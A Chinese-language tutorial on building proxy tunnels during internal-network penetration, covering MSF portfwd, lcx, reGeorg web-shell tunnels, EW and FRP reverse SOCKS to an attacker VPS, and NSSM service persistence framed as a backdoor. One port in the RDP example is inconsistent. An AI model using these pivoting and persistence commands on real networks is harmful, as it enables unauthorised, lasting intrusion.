内网渗透经验(代理篇)
字数 1041 2025-08-18 11:38:48
内网渗透代理技术详解
前言
在内网渗透过程中,会话维持是至关重要的环节。过度依赖单一入口点(如web服务)会导致一旦服务关闭就失去访问权限。本文将详细介绍几种常用的内网代理技术,帮助建立稳定的内网访问通道。
1. MSF端口转发
使用条件
- 目标服务器能够访问外网
- 攻击者拥有公网IP
操作步骤
- 使用meterpreter的portfwd命令进行端口转发:
portfwd add -l 5555 -p 3389 -r 172.16.86.153
将目标主机的3389(RDP)端口转发到本地5555端口
- 使用rdesktop连接本地转发的端口:
rdesktop 127.1.1.0:8888
注意事项
- MSF内置的socks模块速度和稳定性较差,不推荐使用
2. LCX/Portmap工具
使用条件
- 目标服务器能够访问外网
- 攻击者拥有公网IP
Windows端操作
上传lcx.exe并执行:
lcx.exe -slave 1.1.1.1 9999 127.0.0.1 3389
将本地3389端口转发到公网VPS的9999端口
Linux端操作
使用portmap监听:
./portmap -m 2 -p1 9999 -p2 33889
将9999端口接收的数据转发到33889端口
连接方式
直接使用远程桌面连接VPS的33889端口
3. 基于Web的Socks5隧道
适用场景
- 内网服务器不通外网的情况
常用工具
- reGeorg
- reDuh
- Tunna
- Proxifier
reGeorg使用步骤
- 上传对应脚本的tunnel文件到web服务器
- 访问上传文件确认成功
- 本地执行代理脚本:
python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php
- 配置Proxifier使用指定的8888端口
注意事项
- 可能被防护设备检测到异常流量,可尝试reDuh替代
4. EW工具搭建Socks5隧道
使用条件
- 目标主机能访问外网
- 拥有公网IP
操作步骤
- 在VPS上执行:
./ew_for_linux64 -s rcsocks -l 10000 -e 11000
-l: Proxifier连接端口
-e: 通信端口
- 在目标主机执行:
ew_for_Win.exe -s rssocks -d 1.1.1.1 -e 11000
- 配置Proxifier连接VPS的10000端口
5. FRP内网穿透
使用条件
- 目标主机能访问外网
- 拥有公网IP
配置步骤
-
服务端配置frps.ini
-
客户端配置frpc.ini:
[socks5_proxy]
type = tcp
remote_port = 11000
plugin = socks5
plugin_user = xxx
plugin_passwd = xxx
- 上传并运行客户端:
frpc.exe -c 文件路径
- 配置Proxifier连接并验证
多主机配置
- 修改frpc.ini中的名称和端口号避免冲突
清理
tasklist
taskkill /pid 进程号 -t -f
6. 后门持久化
NSSM服务封装
- 安装服务:
nssm install name
- 选择要封装的exe文件
- 设置服务名称并安装
- 检查服务状态确保自动启动
删除服务
nssm remove <servicename>
总结
工具推荐:
- MSF:功能全面但socks性能差
- LCX/Portmap:简单端口转发
- reGeorg:无外网连接时的Web隧道
- EW:稳定socks5隧道
- FRP:功能强大支持认证
选择自己顺手的工具组合使用,关键是要理解各种技术的适用场景和原理。